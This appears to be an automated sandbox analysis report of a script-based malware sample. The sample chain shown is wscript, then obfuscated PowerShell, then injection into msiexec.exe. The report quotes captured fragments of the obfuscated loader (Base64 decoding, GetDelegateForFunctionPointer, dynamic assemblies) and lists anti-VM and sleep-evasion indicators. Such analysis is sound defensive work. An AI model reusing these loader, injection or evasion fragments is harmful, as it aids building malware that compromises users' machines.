              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: comsvcs.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cmlua.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cmutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
              Source: Window Recorder Window detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: Binary string: ystem.Core.pdb source: powershell.exe, 0000000D.00000002.1847691545.000000000295F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1373970474.000002A9B65FD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1872980772.00000000071E2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.1880865485.0000000008280000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000004.00000002.1373809001.000002A9B6525000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb& source: powershell.exe, 00000004.00000002.1408736409.000002A9CEB10000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000D.00000002.1880865485.0000000008280000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("Powershell "echo $Postejens; function Subrogate($plankevrks){$Brandfare=4;do{$Hindbrmarmeladers+=$plankevrks[$Bra", "0")
              Source: Yara match File source: 0000000D.00000002.1882574423.000000000B684000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0000000D.00000002.1882393823.00000000085B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000002.1401976050.000002A9C69D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0000000D.00000002.1867994553.0000000005785000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Thioresorcinol)$gLObAL:kVivaLEREs = [systEM.tExT.eNCoding]::aSciI.gEtSTriNG($EkspEDItReNs)$GLobAL:oLFErTS=$KVivALeREs.SUBsTrING($BElEmRiNgEn,$aLTsAXER)<#Neglendes branchiopallial Luk
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Modularized $telesm $Pothooks), (Trattens @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Baadfarter = [AppDomain]::CurrentDomain.GetAssemblies()$global:Mu
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Portesse)), $Spasmer).DefineDynamicModule($Minileagues, $false).DefineType($Hesteskomagneters240, $Stomatoscope, [System.MulticastDele
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Thioresorcinol)$gLObAL:kVivaLEREs = [systEM.tExT.eNCoding]::aSciI.gEtSTriNG($EkspEDItReNs)$GLobAL:oLFErTS=$KVivALeREs.SUBsTrING($BElEmRiNgEn,$aLTsAXER)<#Neglendes branchiopallial Luk
              Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFB9AAF5205 push eax; ret 4_2_00007FFB9AAF5251
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFB9ABC79FE push ds; ret 4_2_00007FFB9ABC79FF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_045642D7 push ebx; ret 13_2_045642DA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_045662E0 push esp; ret 13_2_045662F9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_04560E70 push esi; retf 0002h 13_2_04560E7A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_0456D4DF pushad ; ret 13_2_0456D4E1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_0456D78C pushfd ; ret 13_2_0456D78D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_073FCF5C push eax; iretd 13_2_073FCF5D
              Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              Source: Initial file Initial file: Do While Appropriative.Status = 0 WScript.Sleep 100
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6270
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3626
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6538
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2866
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5904 Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\System32\svchost.exe TID: 820 Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5852 Thread sleep time: -9223372036854770s >= -30000s
              Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
              Source: wscript.exe, 00000000.00000002.1135303596.000001DD36DD5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#m
              Source: wscript.exe, 00000000.00000002.1135336582.000001DD36DDC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\wwwwww
              Source: msiexec.exe, 0000000F.00000002.2197846460.000000000A63E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWNIM
              Source: wscript.exe, 00000000.00000002.1134990288.000001DD36CF0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp
              Source: wscript.exe, 00000000.00000002.1134990288.000001DD36D70000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2260463112.000001EDAE041000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2260521984.000001EDAE053000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2258449760.000001EDA882B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000004.00000002.1373809001.000002A9B6525000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: PING.EXE, 00000001.00000002.1130048563.000001D4F1F49000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllss
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
              Source: Yara match File source: amsi64_6648.amsi.csv, type: OTHER
              Source: Yara match File source: Process Memory Space: powershell.exe PID: 6648, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: powershell.exe PID: 1232, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 4490000
              Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping Host_6637.6637.6637.657e
              Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
